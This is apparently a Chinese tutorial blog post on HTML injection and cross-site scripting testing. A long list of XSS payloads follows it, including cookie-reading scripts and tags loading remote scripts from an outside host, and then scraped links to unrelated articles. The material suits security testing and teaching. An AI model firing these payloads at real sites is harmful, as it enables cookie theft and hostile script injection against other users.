HTML注入

原理

目前我们所接触展示页面基本上都是由html来实现的,那么后台在处理内容的时候,是对html很少处理的,如果用户刻意通过输入框、文本框、查询框来填写html、js代码(脚本注入),那么就会造成漏洞,若填写恶意网站,病毒网站,这样是很恐怖的。

举个栗子

新建项目标题中添加html标签注入测试
结果:真的变成了一个链接

点击这个连接可以跳转过去,如果不是百度的连接,而是恶意网站呢,测试也是可以研究一下如何去避免注入的,比如通过将特殊字符进行转义,记不记得>,<,可以转义为&gt,&lt当然还可以使用其他方式,这个是可以去扩展的

XSS注入

原理

1、概念

XSS全称为(Cross Site Scripting)跨站脚本攻击
其实XSS攻击是web程序中最常见的漏洞之一,其实就是在网页中添加JavaScript(js)语句来攻击网站,脚本就在浏览器上执行时,可以通过获取用户cookie,导航到恶意网站,弹出恶意信息,携带木马病毒等,这些危害WEB程序真的是致命一击。

2、举个栗子

最常见的xss注入语句:在上一步的造作中,我将文件的标题输入为<script alert(‘hello,xss’)>;保存后,点击这个文件,xss注入就出现了,alert出了我们所输入的内容

XSS注入常用语句
<script>alert('hello,gaga!');</script> //经典语句,哈哈!
>"'><img src="javascript.:alert('XSS')">
>"'><script>alert('XSS')</script>
<table background='javascript.:alert(([code])'></table>
<object type=text/html data='javascript.:alert(([code]);'></object>
"+alert('XSS')+"
'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<s&#99;ript>alert('XSS')</script>
<img src="javas&#99;ript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
<script>alert('Vulnerable')</script>
a.jsp/<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
<IMG SRC="javascript.:alert('XSS');">
<IMG src="/javascript.:alert"('XSS')>
<IMG src="/JaVaScRiPt.:alert"('XSS')>
<IMG src="/JaVaScRiPt.:alert"(&quot;XSS&quot;)>
<IMG SRC="jav&#x09;ascript.:alert('XSS');">
<IMG SRC="jav&#x0A;ascript.:alert('XSS');">
<IMG SRC="jav&#x0D;ascript.:alert('XSS');">
"<IMG src="/java"\0script.:alert(\"XSS\")>";'>out
<IMG SRC=" javascript.:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript.:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript.:alert('XSS')">
<IMG LOWSRC="javascript.:alert('XSS')">
<BGSOUND SRC="javascript.:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet"HREF="javascript.:alert('XSS');">
<IMG SRC='vbscript.:msgbox("XSS")'>
<META. HTTP-EQUIV="refresh"CONTENT="0;url=javascript.:alert('XSS');">
<IFRAME. src="/javascript.:alert"('XSS')></IFRAME>
<FRAMESET><FRAME. src="/javascript.:alert"('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript.:alert('XSS')">
<DIV STYLE="background-image: url(javascript.:alert('XSS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html&#39;);">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE. TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>
<BASE HREF="javascript.:alert('XSS');//">
getURL("javascript.:alert('XSS')")
a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);
<XML SRC="javascript.:alert('XSS');">
"> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT. SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript.:alert('XSS')"
<SCRIPT. a=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT.=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT. a=">"''SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT."a='>'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

参考文章:

http://www.51testing.com/html/93/316693-814899.html

https://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html

WEB漏洞测试——HTML注入及XSS注入相关推荐

  1. WEB漏洞测试(二)——HTML注入 XSS攻击

    上一篇介绍了我们安装BWAPP来完成我们的漏洞测试 在BWAPP中,将HTML Injection和XSS做了非常详细的分类,那么为什么要将两个一起讲呢?归根结底,我觉得这两个分明是一个玩意,充其量是 ...

  2. OWASP TOP 10(2021)之注入漏洞(SQL注入和XSS注入)

    目录 一.SQL注入 1. 漏洞概述及原理 2. 漏洞可能造成的危害 3. 漏洞防范 4. SQL注入的分类与检测 5. 从攻击者的角度,如何绕过SQL注入防范呢? (1)对于关键字的绕过 (2)缓冲 ...

  3. 国产WEB漏洞测试平台——MST

    国产WEB漏洞测试平台--MST Mst是一款Python2.7编写的小漏洞利用平台,可运行在windows | Backtrack | maxosx 等系统,专注于web漏洞的测试和各种利用插件的编 ...

  4. 使用Docker如何搭建Web漏洞测试环境?

    本文和大家分享的是使用Docker搭建Web漏洞测试环境相关知识,希望对大家学习Docker有所帮助,一起来看看吧. 由于一直在做 Web 漏洞扫描器的开发, 那么就必然少不了 Web 的漏洞测试环境 ...

  5. ESP8266 wifi killer固件汉化版web ui界面wifi名字存在xss注入

    一.漏洞简介 了解无线安全的同学应该都知道基于ESP8266的wifi killer固件,可以用来辅助无线渗透测试,其自带了一个web管理界面,其中有一个wifi ap列表,就是这个列表存在xss注入 ...

  6. web漏洞“小迪安全课堂笔记”SQL注入

    文章目录 前言 SQL注入是什么? 注入原理 数据库结构 mysql数据库 参数类型 请求方法 如何判断注入点? 判断注入 1.信息收集 2.数据注入 3.高权限注入 魔术引号开关 跨库注入 获取所有 ...

  7. 各种Web漏洞测试平台

    为什么80%的码农都做不了架构师?>>>    Sqli Lab ​支持报错注入.二次注入.盲注.Update注入.Insert注入.Http头部注入.二次注入练习等.支持GET和P ...

  8. WEB漏洞篇——跨站脚本攻击(XSS)

    目录 一.XSS简述 1.1 什么是XSS 1.2 XSS分类 1.3 DOM XSS漏洞演示 二.XSS攻击进阶 2.1 初探XSS Payload 2.2 强大的XSS Payload 2.3 X ...

  9. 记录一款web漏洞扫描工具,包含sql注入、xss攻击等各种漏洞扫描

    名称:Burpsuite 官网地址:https://portswigger.net/burp/releases

最新文章

  1. 「译」有限状态机在 CSS 动画中的应用
  2. Apache Flink 零基础入门(十二)Flink sink
  3. DLL入门浅析(1)——如何建立DLL
  4. 大工13秋《计算机文化基础》在线测试1,大工13秋《计算机文化基础》辅导资料六...
  5. mysql批量删除进程_小程序批量删除云数据库里的数据
  6. 纵深防御及MS纵深防御模型
  7. 直线段的矢栅转换算法(DDA算法、中心画线算法、Bresenham算法)
  8. T-SQL 基础简介
  9. 28、ZigBee 开发教程之基础篇—红外对射计数器
  10. COSTDOWN版本的NRF51802和NRF51822的复位问题
  11. developer 开启双重验证 your appid needs to be updated
  12. python的主流开发工具排名,最常用的python开发工具
  13. Linux面试指令---nl指令
  14. DEV Gridcontrol 多选功能实现
  15. egg extend ts_KPL五周T队排名,“天王级”战队只有两个,TS被踢出队列
  16. 第十二届闽台陈靖姑民俗文化旅游节在福州启动
  17. ChromeDriver与Chrome版本对应参照表及ChromeDriver下载链接
  18. html中段落标志中标注文件子标题的是,Macromedia网页设计认证部分试题
  19. 多个DHL快递物流怎么同时查询最方便
  20. RS232的硬件流控:DCD DSR DTR RTS CTS

热门文章

  1. Java 基础:多态
  2. VMware Workstation 与 Device/Credential Guard 不兼容。在禁用 Device/Credential Guard 后.....报错解决
  3. 笔记:caffe安装编译,并用ssd gpu训练自己的数据集
  4. 常用清新蓝花背景word通用个人简历模板
  5. 掌握这些图片无损压缩工具,轻松搞定图片压缩
  6. 快速集成华为AGC云存储服务-Web
  7. 自动称重机动态和静态称重方式,很好理解!
  8. 国际经济与贸易专业与计算机联系,经济与贸易专业(国际经济与贸易方向).docx...
  9. Webug-SSRF
  10. WIN32虚拟STM32F7 LCD屏幕(WIN32虚拟单片机)